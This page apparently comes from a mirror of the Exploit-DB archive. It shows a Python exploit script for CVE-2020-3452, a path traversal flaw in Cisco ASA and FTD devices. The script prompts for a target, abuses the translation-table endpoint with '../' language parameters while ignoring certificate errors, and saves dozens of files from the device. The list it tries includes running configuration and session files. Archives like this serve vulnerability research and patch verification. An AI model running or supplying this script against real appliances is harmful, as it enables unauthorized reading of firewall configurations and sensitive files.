bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/webapps/49262.py
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

113 lines
No EOL
2.7 KiB
Python
Executable file
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Exploit Title: Cisco ASA 9.14.1.10 and FTD 6.6.0.1 - Path Traversal (2)
# Date: 12 Dec 2020
# Exploit Author: Freakyclown@cygenta.co.uk
# Vendor Homepage: cisco.com
# Software Link: Its against Hardware, specifically ASAs and FTDs
# Version: ASAs (from version 9.6 to 9.14.1.10) and FTDs (versions 6.2.3 to 6.6.0.1)
# Tested on: exploit runs on Python3 on OSX and on Kali Linux against cisco ASA 9.14
# CVE : CVE-2020-3452
# Github : https://github.com/cygenta/CVE-2020-3452
import requests
# Written by freakyclown for @CygentaHQ
# Cisco ASA Path Traversal
# CVE-2020-3452
# Usage: CVE-2020-3452.py {target}"
# Example: CVE-2020-3452.py 192.168.0.12"
# Requires - Requests - pip3 install requests
#
# This tool takes advantage of the above cve and attempts to
# download files as listed below, it is suggested that you make
# a working folder for the outputfiles to avoid confusion if
# attacking mutliple ASA's
# set your target
target = input("Enter target IP/Url: ")
def grabstuff():
for file in files:
print("trying: ", file)
#set request parameters
params = (
('type', 'mst'),
('textdomain', '+CSCOE+/'+file),
('default-language', ''),
('lang', '../'),
)
# set the response to the result of the request, inputting in target and params and ignoring ssl cert problems
response = requests.get('https://'+target+'/+CSCOT+/translation-table', params=params, verify=False)
# write the file to the disk
f = open(file,"w")
f.write(response.text)
f.close()
# this is a list of files available to download, more will be added in time
# if anyone has a list of ASA files, I'd be happy to add here
files = {
"sess_update.html",
"blank.html",
"noportal.html",
"portal_ce.html",
"portal.html",
"logon_custom.css",
"svc.html",
"logo.gif",
"portal_inc.lua",
"nostcaccess.html",
"session.js",
"portal.js",
"portal_custom.css",
"running.conf",
"tlbrportal_forms.js",
"logon_forms.js",
"win.js",
"portal.css",
"lced.html",
"pluginlib.js",
"useralert.html",
"ping.html",
"app_index.html",
"shshimdo_url",
"session_password.html",
"relayjar.html",
"relayocx.html",
"color_picker.js",
"color_picker.html",
"cedhelp.html",
"cedmain.html",
"cedlogon.html",
"cedportal.html",
"portal_elements.html",
"commonspawn.js",
"common.js",
"appstart.js",
"relaymonjar.html",
"relaymonocx.html",
"cedsave.html",
"tunnel_linux.jnlp",
"ask.html",
"no_svc.html",
"preview.html",
"cedf.html",
"ced.html",
"logon_redirect.html",
"logout.html",
"tunnel_mac.jnlp",
"gp-gip.html",
"auth.html",
"wrong_url.html",
"logon.html"}
# obvious thing is obvious, try the things and barf if fail
try:
grabstuff()
except Exception as err:
print("Something went wrong sorry")
print(err)
Reference in a new issue View git blame Copy permalink